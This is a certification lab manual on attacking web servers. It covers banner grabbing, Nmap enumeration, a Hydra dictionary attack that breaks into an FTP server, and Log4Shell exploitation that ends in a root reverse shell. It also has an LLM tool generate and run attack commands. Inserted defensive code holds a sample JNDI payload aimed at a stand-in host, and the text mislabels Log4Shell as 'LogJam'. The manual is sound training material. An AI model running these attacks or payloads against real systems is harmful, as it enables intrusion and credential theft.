Module 13

Module 13 focuses on hacking web servers, detailing the process of footprinting to gather information about a target server's security and vulnerabilities. It covers tools like Netcat, Telnet, and Nmap for information gathering, as well as methods for attacking the server, including dictionary attacks and exploiting vulnerabilities like Log4j. The module emphasizes the importance of ethical hacking practices to assess and strengthen web server security.

Uploaded by devangshuwork

Module 13 Hacking Web Servers

Lab 1: Footprint the Web Server


Lab Scenario

The first step of hacking web servers for a professional ethical hacker or pen tester is to collect
as much information as possible about the target web server and analyze the collected
information in order to find lapses in its current security mechanisms. The main purpose is to
learn about the web server's remote access capabilities, its ports and services, and other
aspects of its security.

The information obtained in this step helps in assessing the security posture of the web server.
Footprinting may involve searching the Internet, newsgroups, bulletin boards, etc. for gathering
information about the target organization's web server. There are also tools such as Whois.net
and Whois Lookup that extract information such as the target's domain name, IP address, and
autonomous system number.

Web server fingerprinting is an essential task for any penetration tester. Before proceeding to
hack or exploit a web server, the penetration tester must know the type and version of the
web server, as most attacks and exploits are specific to the type and version of the server
used by the target. These methods help a penetration tester gather information about and
analyze the target so that they can perform a thorough test and deploy appropriate
methods to mitigate such attacks on the server.

An ethical hacker or penetration tester must perform footprinting to detect the loopholes in the
web server of the target organization. This will help in predicting the effectiveness of additional
security measures for strengthening and protecting the web server of the target organization.

The labs in this exercise demonstrate how to footprint a web server using various footprinting
tools and techniques.

Lab Objectives

• Footprint a web server using Netcat and Telnet

• Enumerate web server information using Nmap Scripting Engine (NSE)

Overview of Web Server Footprinting

By performing web server footprinting, it is possible to gather valuable system-level data such as
account details, OS, software versions, server names, and database schema details. The Telnet
utility can footprint a web server and gather information such as the server name, server type,
OS, and running applications. Dedicated footprinting tools such as Netcraft, ID Serve, and
httprecon can also extract this information from the target server. Let us look at the features and
the types of information these tools can collect from the target server.

Task 1: Footprint a Web Server using Netcat and Telnet


Netcat

Netcat is a networking utility that reads and writes data across network connections, using the
TCP/IP protocol. It is a reliable "back-end" tool used directly or driven by other programs and
scripts. It is also a network debugging and exploration tool.

Telnet

Telnet is a client-server network protocol widely used on the Internet and on LANs. It provides
a remote login session for a user, emulating a terminal attached to another computer. The
primary security problems with Telnet are the following:

• It does not encrypt any data sent through the connection.

• It lacks an authentication scheme.

Telnet can be used for banner grabbing: by sending a plain HTTP request to a web server, it
reveals the Server field in the HTTP response header.

1. Click Parrot Security to switch to the Parrot Security machine.

2. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

3. In the terminal window, run nc -vv www.moviescope.com 80.


4. Once you hit Enter, Netcat displays the hosting information of the provided domain.

5. Now, type GET / HTTP/1.0 and press Enter twice.

6. Netcat will perform the banner grabbing and gather information such as content
type, last modified date, accept ranges, ETag, and server information.
7. In the terminal window, run clear to clear the Netcat output.
8. Now, perform banner grabbing using Telnet. In the terminal window, run telnet
www.moviescope.com 80.
9. Telnet will connect to the domain.

10. Type GET / HTTP/1.0 and press Enter twice. Telnet will perform the banner
grabbing and gather information such as content type, last modified date, accept
ranges, ETag, and server information.
11. This concludes the demonstration of how to gather information about the target
web server using the Netcat and Telnet utilities.

12. Close the terminal window on the Parrot Security machine.
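The banner grab in steps 3 to 10 is a plain HTTP request followed by reading the response headers. As an added example that is not part of the lab manual, the Python below sends the same `GET / HTTP/1.0` request and parses the reply into the fields the steps mention (Server, Content-Type, Last-Modified, Accept-Ranges, ETag), then runs the check a defender would apply to their own server: does any header disclose a product version? The sample response bytes are constructed, not captured from www.moviescope.com.

```python
"""Parse what a banner grab returns and report version disclosures.

Added example, not code from the lab manual. The SAMPLE_RESPONSE below is
constructed; it is not a capture from www.moviescope.com.
"""
import re
import socket

# Constructed sample of the kind of reply the lab's request elicits.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Last-Modified: Tue, 02 Jan 2024 10:15:00 GMT\r\n"
    b"Accept-Ranges: bytes\r\n"
    b'ETag: "0a1b2c3d4e5f6:0"\r\n'
    b"Server: Microsoft-IIS/10.0\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

# Product/version shape used by Server-style headers, e.g. 'Apache/2.4.57' or 'IIS/10.0'.
VERSION_TOKEN = re.compile(r"[A-Za-z][\w.-]*/\d+(\.\d+)*|^\d+(\.\d+)+$")


def grab_banner(host: str, port: int = 80, timeout: float = 5.0) -> bytes:
    """Send the same request the lab types into nc/telnet and return the raw reply."""
    request = f"GET / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_response(raw: bytes):
    """Return (status_code, headers) from a raw HTTP response.

    Header names are lower-cased; a repeated header keeps its last value.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    match = re.match(r"HTTP/\d\.\d (\d{3})", lines[0])
    if not match:
        raise ValueError(f"not an HTTP status line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # skip malformed header lines instead of aborting
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return int(match.group(1)), headers


def banner_fields(headers: dict) -> dict:
    """The fields the lab steps call out: server, content type, last modified, accept ranges, ETag."""
    wanted = ("server", "content-type", "last-modified", "accept-ranges", "etag")
    return {name: headers.get(name) for name in wanted}


def version_disclosures(headers: dict) -> list:
    """Defender-side check: headers that reveal a product version.

    A hardened server (ServerTokens Prod on Apache, server_tokens off on
    nginx, or the header stripped at the reverse proxy) yields an empty list.
    """
    leaky = []
    for name in ("server", "x-powered-by", "x-aspnet-version"):
        value = headers.get(name)
        if value and VERSION_TOKEN.search(value):
            leaky.append((name, value))
    return leaky


if __name__ == "__main__":
    status, hdrs = parse_response(SAMPLE_RESPONSE)
    print("status:", status)
    for key, val in banner_fields(hdrs).items():
        print(f"{key}: {val}")
    print("version disclosures:", version_disclosures(hdrs))
```

Run against a host of your own with `parse_response(grab_banner("your-host"))`; an empty `version_disclosures` result is the state to aim for, since the version string is exactly what an attacker matches against exploit databases in the tasks that follow.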

Question 13.1.1.1

Perform banner grabbing using Telnet on the website www.moviescope.com. Identify the web-
server application used to host the website.

Task 2: Enumerate Web Server Information using Nmap Scripting Engine (NSE)

The web applications that are available on the Internet may have vulnerabilities. Some attack
strategies need the Administrator role on your server, but often attackers simply need sensitive
information about the server. Running Nmap with the http-enum.nse script returns a listing of
the applications, directories, and files it uncovers, which makes it possible to check them for
known vulnerabilities or misuse. This technique can reveal real (and often careless) security
flaws, such as sites built on platforms like WordPress and PrestaShop that leave installation
folders accessible when they should have been deleted once setup was complete. Once you have
identified a vulnerability, you can look for a fix for it.

Nmap, along with the Nmap Scripting Engine, can extract a lot of valuable information from the
target web server. In addition to Nmap commands, the Nmap Scripting Engine (NSE) provides
scripts that reveal various useful information about the target web server to an attacker.

1. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

2. Enumerate the directories used by web servers and web applications, in the
terminal window. Run nmap -sV --script=http-enum [target website].

3. In this scan, we are enumerating the www.goodshopping.com website.

4. This script enumerates and provides you with the output details, as shown in the
screenshot.
5. The next step is to discover the hostnames that resolve the targeted domain.

6. In the terminal window, run nmap --script hostmap-bfk --script-args
hostmap-bfk.prefix=hostmap- www.goodshopping.com.
7. Perform an HTTP trace on the targeted domain. In the terminal window,
run nmap --script http-trace -d www.goodshopping.com.

8. This script will detect a vulnerable server that uses the TRACE method by
sending an HTTP TRACE request that shows if the method is enabled or not.
9. Now, check whether Web Application Firewall is configured on the target host or
domain. In the terminal window, run nmap -p80 --script http-waf-detect
www.goodshopping.com.

10. This command will scan the host and attempt to determine whether a web server
is being monitored by an IPS, IDS, or WAF.

11. This command will probe the target host with malicious payloads and detect the
changes in the response code.
12. This concludes the demonstration of how to enumerate web server information
using the Nmap Scripting Engine (NSE).

13. Close the terminal windows on the Parrot Security machine.

Question 13.1.2.1

Use Nmap Scripting Engine (NSE) to extract information about the website
www.goodshopping.com. Enter the port number of the ms-wbt-server service, which is open on
the web server.

Question 13.1.2.2

Use Nmap Scripting Engine (NSE) to check whether a web-application firewall is configured for
the website www.goodshopping.com. Enter YES if a web-application firewall is configured for
www.goodshopping.com or NO otherwise.

Lab 2: Perform a Web Server Attack

Lab Scenario

After gathering required information about the target web server, the next task for an ethical
hacker or pen tester is to attack the web server in order to test the target network's web server
security infrastructure. This requires knowledge of how to perform web server attacks.

Attackers perform web server attacks with certain goals in mind. These goals may be technical or
non-technical. For example, attackers may breach the security of the web server to steal
sensitive information for financial gain, or merely for curiosity's sake. The attacker tries all
possible techniques to extract the necessary passwords, including password guessing, dictionary
attacks, brute force attacks, hybrid attacks, pre-computed hashes, rule-based attacks, distributed
network attacks, and rainbow table attacks. The attacker needs patience, as some of these
techniques are tedious and time-consuming. The attacker can also use automated tools such as
Brutus and THC-Hydra to crack web passwords.

An ethical hacker or pen tester must test the company's web server against various attacks and
other vulnerabilities. It is important to find various ways to extend the security test by analyzing
web servers and employing multiple testing techniques. This will help to predict the effectiveness
of additional security measures for strengthening and protecting web servers of the organization.

Lab Objectives

• Crack FTP credentials using a Dictionary Attack

• Gain Access to Target Web Server by Exploiting Log4j Vulnerability

Overview of Web Server Attack

Attackers can cause various kinds of damage to an organization by attacking a web server,
including:

• Compromise of a user account
• Secondary attacks from the website and website defacement
• Root access to other applications or servers
• Data tampering and data theft
• Damage to the company's reputation

Task 1: Crack FTP Credentials using a Dictionary Attack


A dictionary or wordlist contains thousands of words that are used by password cracking tools to
break into a password-protected system. An attacker may either manually crack a password by
guessing it or use automated tools and techniques such as the dictionary method. Most
password cracking techniques succeed because of weak or easily guessable passwords.

First, find the open FTP port using Nmap, and then perform a dictionary attack using the THC
Hydra tool.
1. Click Parrot Security to switch to the Parrot Security machine.

Here, we will use a sample password file (Passwords.txt) containing a list of
passwords to crack the FTP credentials on the target machine.

2. Assume that you are an attacker, and you have observed that the FTP service is
running on the Windows 11 machine.

3. Perform an Nmap scan on the target machine (Windows 11) to check if the
FTP port is open.

4. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

5. In the terminal window, run nmap -p 21 [IP Address of Windows 11].

Here, the IP address of Windows 11 is 10.10.1.11.

6. Observe that port 21 is open in Windows 11.

7. Check if an FTP server is hosted on the Windows 11 machine.


8. Run ftp [IP Address of Windows 11]. You will be prompted to enter user
credentials. The need for credentials implies that an FTP server is hosted on the
machine.

9. Try entering random usernames and passwords in an attempt to gain FTP


access.

The password you enter will not be visible on the screen.

10. As shown in the screenshot, you will not be able to log in to the FTP server.
Close the terminal window.
11. Now, to attempt to gain access to the FTP server, perform a dictionary attack
using the THC Hydra tool.

12. Click Places from the top-section of the Desktop and click Desktop from the
drop-down options.
13. Navigate to CEHv13 Module 13 Hacking Web Servers folder and
copy Wordlists folder.

Press Ctrl+C to copy the folder.


14. Paste the copied folder (Wordlists) on the Desktop. Close the window.

Press Ctrl+V to paste the folder.


15. In the Parrot Security machine, open a Terminal window and execute sudo
su to run the programs as a root user (When prompted, enter the
password toor).

16. In the terminal window, run hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt
-P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://[IP Address of Windows 11].

The IP address of Windows 11 in this lab exercise is 10.10.1.11. This IP
address might vary in your lab environment.
17. Hydra tries various combinations of usernames and passwords (present in
the Usernames.txt and Passwords.txt files) on the FTP server and outputs
cracked usernames and passwords.

This might take some time to complete.

18. On completion of the password cracking, the cracked credentials appear, as
shown in the screenshot.
19. Try to log in to the FTP server using one of the cracked username and password
combinations. In this lab, use Martin's credentials to gain access to the server.

20. In the terminal window, run ftp [IP Address of Windows 11].

21. Enter Martin's user credentials (Martin and apple) to check whether you can
successfully log in to the server.

22. On entering the credentials, you will successfully be able to log in to the server.
An ftp terminal appears, as shown in the screenshot.
23. Now, you can remotely access the FTP server hosted on the Windows
11 machine.

24. Run mkdir Hacked to remotely create a directory named Hacked on
the Windows 11 machine through the ftp terminal.
25. Click Windows 11 to switch to the Windows 11 machine and navigate
to C:\FTP.

26. View the directory named Hacked, as shown in the screenshot:


27. You have successfully gained remote access to the FTP server by obtaining the
appropriate credentials.

28. Click Parrot Security to switch back to the Parrot Security machine.

29. Enter help to view all other commands that you can use through the FTP
terminal.
30. On completing the task, enter quit to exit the ftp terminal.
31. This concludes the demonstration of how to crack FTP credentials using a
dictionary attack and gain remote access to the FTP server.

32. Close all open windows on both the Parrot Security and Windows
11 machines.
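From the server's side, the Hydra run in steps 16 to 18 looks like a burst of failed logins from one client, possibly followed by a success. The detector below is an added example, not part of the lab or of Hydra: it parses vsftpd-style log lines (the format is assumed; the lines are constructed, with the client IP 10.10.1.13 and the user Martin taken from this lab), counts failures per client in a sliding window, and records whether a login from that client succeeded after the burst, which is the "password was cracked" signal an incident responder wants.

```python
"""Detect dictionary/brute-force logins against an FTP server from its log.

Added example, not code from the lab manual. Log lines are constructed in
vsftpd's style (an assumption); adapt parse_line() to your server's format.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: six failures in three seconds from 10.10.1.13, then a
# successful login as Martin; 10.10.1.5 is an ordinary user who mistyped once.
SAMPLE_LOG = """\
Fri Jan 12 10:15:01 2024 [pid 3101] [admin] FAIL LOGIN: Client "10.10.1.13"
Fri Jan 12 10:15:01 2024 [pid 3102] [admin] FAIL LOGIN: Client "10.10.1.13"
Fri Jan 12 10:15:02 2024 [pid 3103] [Martin] FAIL LOGIN: Client "10.10.1.13"
Fri Jan 12 10:15:02 2024 [pid 3104] [Martin] FAIL LOGIN: Client "10.10.1.13"
Fri Jan 12 10:15:03 2024 [pid 3105] [Martin] FAIL LOGIN: Client "10.10.1.13"
Fri Jan 12 10:15:03 2024 [pid 3106] [Martin] FAIL LOGIN: Client "10.10.1.13"
Fri Jan 12 10:15:04 2024 [pid 3107] [Martin] OK LOGIN: Client "10.10.1.13"
Fri Jan 12 10:20:00 2024 [pid 3200] [jason] FAIL LOGIN: Client "10.10.1.5"
Fri Jan 12 10:20:05 2024 [pid 3201] [jason] OK LOGIN: Client "10.10.1.5"
Fri Jan 12 10:20:06 2024 [pid 3202] CONNECT: Client "10.10.1.5"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse_line(line: str):
    """Return (timestamp, user, 'OK'|'FAIL', client_ip) or None for other events."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
    return ts, m["user"], m["result"], m["ip"]


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Alert on any client with >= threshold failed logins inside the window.

    Returns {client_ip: {"failures": total, "users": set_of_usernames_tried,
    "success_after_burst": username_or_None}}. The last field is the one that
    turns a noisy alert into an incident: the dictionary attack worked.
    """
    recent = defaultdict(deque)    # ip -> timestamps of failures in the window
    total_fail = defaultdict(int)
    tried_users = defaultdict(set)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, user, result, ip = rec
        if result == "FAIL":
            total_fail[ip] += 1
            tried_users[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()  # drop failures that fell out of the window
            if len(q) >= threshold and ip not in alerts:
                alerts[ip] = {"failures": 0, "users": set(), "success_after_burst": None}
        elif ip in alerts and alerts[ip]["success_after_burst"] is None:
            alerts[ip]["success_after_burst"] = user
    for ip, alert in alerts.items():
        alert["failures"] = total_fail[ip]
        alert["users"] = set(tried_users[ip])
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, alert)
```

The threshold and window are the knobs to tune against your own baseline; the same sliding-window logic applies to SSH, RDP or web login logs once `parse_line()` is swapped. The mitigations the alert should trigger are the usual ones the lab's weak credentials illustrate: lockout or rate limiting per source, and no dictionary words such as "apple" as passwords.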

Question 13.2.1.1

Perform a dictionary attack using the THC Hydra tool to remotely access the FTP server hosted
on the Windows 11 machine. Note: The wordlist file is located at CEHv13 Module 13 Hacking
Web Servers/Wordlists. Enter the password of the user Martin.

Question 13.2.1.2

Perform a dictionary attack using the THC Hydra tool to remotely access the FTP server hosted
on the Windows 11 machine. Enter the name of the user with the password “qwerty."
Task 2: Gain Access to Target Web Server by Exploiting Log4j Vulnerability

Log4j is an open-source logging framework that developers use to record the various types of
log messages an application produces. The Log4j vulnerability, known as Log4Shell (also called
LogJam), is a zero-day RCE (Remote Code Execution) vulnerability tracked as CVE-2021-44228.
Vulnerable Log4j versions perform insecure JNDI lookups on logged strings; when such a lookup is
paired with the LDAP protocol, it can be exploited to exfiltrate data or execute arbitrary code.

Here, we will gain backdoor access by exploiting Log4j vulnerability.

Here, we will install a vulnerable server in the Ubuntu machine and use the Parrot
Security machine as the host machine to target the application.

1. Click Ubuntu to switch to the Ubuntu machine, and log in with Ubuntu/toor credentials.

2. In the left pane, under Activities list, scroll down and click the Terminal icon to
open the Terminal window.

3. Now, type sudo su and hit Enter to gain super-user access. Ubuntu will ask for
the password; type toor as the password and hit Enter.

4. First, we need to install docker.io in the Ubuntu machine. To do that, type sudo apt-get
update and press Enter.
5. Once the update is completed, type sudo apt-get install docker.io and
press Enter to install docker.

If a question appears Do you want to continue? type Y and press Enter.


If a Configuring docker.io window appears, select Yes and press Enter.
6. Once docker.io is successfully installed, type cd log4j-shell-poc/ and
press Enter to navigate to log4j-shell-poc directory.

7. Now, we need to set up the Log4j vulnerable server. To do that, type docker build -t
log4j-shell-poc . and press Enter.

-t: tags the built image with the name log4j-shell-poc (the trailing . is the build context,
the current directory).


8. Type docker run --network host log4j-shell-poc and press Enter, to start the
vulnerable server.
9. Leave the server running in the Ubuntu machine.

10. Click Parrot Security to switch to the Parrot Security machine.

11. We will first scan the target machine to identify any vulnerable services running
on it.

12. Open a Terminal window with superuser privileges and run the nmap -sV -sC
10.10.1.9 command to view the running services.

-sV option enables version detection. This means Nmap will try to determine the
version of the services running on open ports. -sC option enables the use of
default scripts in the Nmap Scripting Engine (NSE). These scripts perform
various tasks like service detection, vulnerability detection, and more.
13. From the result we can see that port 8080 is open and Apache Tomcat/Coyote
1.1 server is running on the target system.

14. Upon investigation, we can see that Apache is vulnerable to a Remote Code
Execution (RCE) attack. Now we will use searchsploit to find RCE vulnerabilities
pertaining to the target server.

15. In the terminal window run searchsploit -t Apache RCE command to view the
RCE vulnerabilities on the Apache server.
16. Now, we need to select a vulnerability from the list to exploit the server. From the
Nmap scan we found that the Apache Tomcat server is running JSP, so we will target
Java vulnerabilities from the list.

17. We can see that the Java platform is vulnerable to the Apache Log4j 2 - Remote
Command Execution (RCE) exploit.
18. We will now exploit Log4j vulnerability present in the target Web Server to
perform Remote code execution.

19. Click the Firefox icon at the top of the Desktop to open a browser window.

20. In the address bar of the browser, type http://10.10.1.9:8080 and press Enter.
21. Observe that the Log4j vulnerable server is running on the Ubuntu machine; leave
Firefox and the website open.

22. Switch to the Terminal window, run cd log4j-shell-poc/ and press Enter, to
enter into log4j-shell-poc directory.
23. Now, we need to install JDK 8. To do that, open a new terminal window, type
sudo su, and press Enter to run the programs as a root user.

In the [sudo] password for attacker field, type toor as a password and
press Enter.

24. We need to extract the JDK zip file which is already placed at the /home/attacker
location.

25. Type tar -xf jdk-8u202-linux-x64.tar.gz and press Enter to extract the file.

-x: extract the archive; -f: the archive file name that follows.

26. Now we will move the jdk1.8.0_202 into /usr/bin/. To do that, type mv
jdk1.8.0_202 /usr/bin/ and press Enter.
27. Now, we need to update the installed JDK path in the poc.py file.

28. Navigate to the previous terminal window. In the terminal, type pluma
poc.py and press Enter to open poc.py file.
29. In the poc.py file scroll down and in line 62,
replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac.
30. Scroll down to line 87 and
replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
31. Scroll down to line 99 and
replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
32. After making all the changes save the changes and close the poc.py editor
window.

33. Now, open a new terminal window and type nc -lvp 9001 and press Enter, to
initiate a netcat listener as shown in screenshot.
34. Switch to previous terminal window and type python3 poc.py --userip
10.10.1.13 --webport 8000 --lport 9001 and press Enter, to start the
exploitation and create payload.
35. Now, copy the payload generated in the send me: section.
36. Switch to Firefox browser window, in Username field paste the payload that
was copied in previous step and in Password field type password and
press Login button as shown in the screenshot.

In the Password field you can enter any password.


37. Now switch to the netcat listener; you can see that a reverse shell has opened.
38. In the listener window, type pwd and press Enter to view the present working
directory.
39. Now, type whoami and press Enter.
40. We can see that we have shell access to the target web application as the root
user.

41. The vulnerable Log4j instance takes the payload as input and processes it; as a
result, we obtain a reverse shell.

42. This concludes the demonstration of how to gain backdoor access exploiting
Log4j vulnerability.

43. Close all open windows and document all acquired information.
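The exploit in steps 34 to 41 only works because the application logs the Username field and a vulnerable Log4j 2 expands `${...}` lookups inside logged strings. The detection logic below is an added example, not part of the lab or of log4j-shell-poc: it classifies submitted form fields (or any value you log) by whether they carry lookup syntax, a JNDI lookup with its scheme, or nested lookups that a naive search for the word "jndi" would miss. The sample requests are constructed; attacker.example is a placeholder hostname.

```python
"""Detect Log4Shell-style lookup strings in user-controlled input.

Added example, not part of the lab or of log4j-shell-poc. Sample inputs are
constructed; attacker.example is a placeholder for an attacker-run LDAP host.
"""
import re

# Scheme after 'jndi:' tells you which outbound protocol the lookup would use.
JNDI_RE = re.compile(r"jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def classify_value(value: str):
    """Return None for benign input, otherwise (severity, reason).

    - `${...jndi:<scheme>...}`: the lookup that reaches out over LDAP/RMI/DNS.
    - `${${...}}`: nested lookups; Log4j resolves them inside-out, so a filter
      that only searches for the literal word 'jndi' misses them.
    - a lone `${...}`: lookup syntax with no known-bad content; worth logging.
    """
    if "${" not in value:
        return None
    jndi = JNDI_RE.search(value)
    if jndi:
        return ("high", f"jndi lookup via {jndi.group(1).lower()}")
    if value.count("${") > 1:
        return ("high", "nested lookup")
    return ("low", "lookup syntax")


def scan_request(fields: dict) -> list:
    """Classify every field of one request; returns [(field, severity, reason), ...]."""
    findings = []
    for name, value in fields.items():
        if not isinstance(value, str):
            continue
        verdict = classify_value(value)
        if verdict:
            findings.append((name, *verdict))
    return findings


# Constructed requests: the first mimics the lab's login attempt (payload in the
# Username field), the second is the legitimate login, the rest are ambiguous.
SAMPLE_REQUESTS = [
    {"username": "${jndi:ldap://attacker.example:1389/a}", "password": "password"},
    {"username": "Martin", "password": "apple"},
    {"username": "${${env:USER}}", "password": "x"},
    {"comment": "total is ${amount}"},
]


def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """Findings for a batch of requests, with the request index attached."""
    out = []
    for i, req in enumerate(requests):
        for finding in scan_request(req):
            out.append((i, *finding))
    return out


if __name__ == "__main__":
    for hit in scan_all():
        print(hit)
```

Treat a "high" hit as an incident indicator, not just a blocked request: check the application host for outbound LDAP/RMI connections and for the new process a reverse shell like the lab's would spawn. Detection is a backstop; the durable fix is upgrading Log4j 2 to a version that removes the JNDI lookup (2.17.1 or later), since the `log4j2.formatMsgNoLookups` flag was only a partial mitigation.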

Question 13.2.2.1

Install Apache Tomcat web server on Ubuntu machine and use Parrot Security machine to scan
for web server and exploit log4j vulnerability present in the Apache Tomcat on Ubuntu machine
to gain access to the vulnerable server. Determine the http-server-header that was found during
nmap scan on 10.10.1.9.

Lab 3: Perform Web Server Hacking using AI

Lab Scenario

The objective of this lab is to simulate the process of hacking a web server using AI-driven
tools and techniques. This exercise will involve footprinting, fingerprinting, and exploiting
vulnerabilities to understand the security posture of the target web server.

Lab Objectives

• Perform Web Server Footprinting and Attacks using ShellGPT

Overview of Web Server Hacking using AI

In the realm of cybersecurity, the role of artificial intelligence (AI) has become increasingly
significant, especially in the domain of ethical hacking. AI-powered tools and techniques
provide ethical hackers with enhanced capabilities to discover vulnerabilities, automate
attacks, and strengthen defenses. Web server hacking, a critical aspect of penetration testing,
leverages AI to perform footprinting, fingerprinting, and exploitation more efficiently and
effectively.

Task 1: Perform Web Server Footprinting and Attacks using ShellGPT

Web server footprinting and subsequent attacks are critical steps in penetration testing or
ethical hacking to assess the security posture of a target organization. ShellGPT, an AI-driven
tool, enhances these processes by automating information gathering, fingerprinting, and
vulnerability identification tasks.

Here, we will use ShellGPT to perform web server footprinting and attacks.

The commands generated by ShellGPT may vary depending on the prompt used and the tools
available on the machine. Due to these variables, the output generated by ShellGPT might
differ from what is shown in the screenshots. These differences arise from the dynamic nature
of the AI's processing and the diverse environments in which it operates. As a result, you may
observe differences in command syntax, execution, and results while performing this lab task.

1. Click Parrot Security to switch to the Parrot machine, and log in with attacker/toor.
Open a Terminal window and execute sudo su to run the program as a root user (When
prompted, enter the password toor).

The password that you type will not be visible.

2. Run the bash sgpt.sh command to configure ShellGPT and the AI activation key.

You can follow the Instructions to Download your AI Activation Key in Module 00: CEH Lab
Setup to obtain the AI activation key. Alternatively, follow the instructions available in the
file, Instructions to Download your AI_Activation_Key - CEHv13.

3. To perform directory traversal using ShellGPT, run the sgpt --shell "Perform a directory
traversal on target url https://certifiedhacker.com using gobuster" command.

4. In the prompt, type E and press Enter to execute the command.


5. To perform FTP bruteforce attack run sgpt --shell "Attempt FTP login on
target IP 10.10.1.11 with hydra using usernames and passwords file from
/home/attacker/Wordlists" command.

In the prompt type E and press Enter to execute the command.


6. To perform webserver footprinting on target IP address using ShellGPT,
run sgpt --shell "Perform webserver footprinting on target IP
10.10.1.22" command.

In the prompt type E and press Enter to execute the command.


7. Run sgpt --shell "Perform web server footprinting on target IP 10.10.1.22
using Netcat by sending an HTTP request and analyzing the
response." command to perform web server footprinting using netcat.

In the prompt type E and press Enter to execute the command.


8. To perform website mirroring using ShellGPT, run the sgpt --shell "Mirror the
target website certifiedhacker.com" command.

Alternatively, you can use HTTrack to mirror a target website; to do so, run the sgpt
--shell "Mirror the target website https://certifiedhacker.com with
httrack on desktop" command.
In the prompt type E and press Enter to execute the command.
9. To view the mirrored website navigate to Places -> Home Folder ->
certifiedhacker.com location and double-click on index.html file.
10. The mirrored certifiedhacker.com website opens up in Firefox browser.
11. Apart from the aforementioned commands, you can further use ShellGPT
prompts to perform Web Server Hacking.

12. This concludes the demonstration of webserver footprinting and attacks using
ShellGPT.

13. Close all open windows and document all the acquired information.

Question 13.3.1.1

In the Parrot Security machine, use ShellGPT to write and execute a prompt to perform a
directory traversal attack on the https://certifiedhacker.com website using gobuster. Enter the
status code of the /docs directory of certifiedhacker.com that is displayed by the gobuster tool.
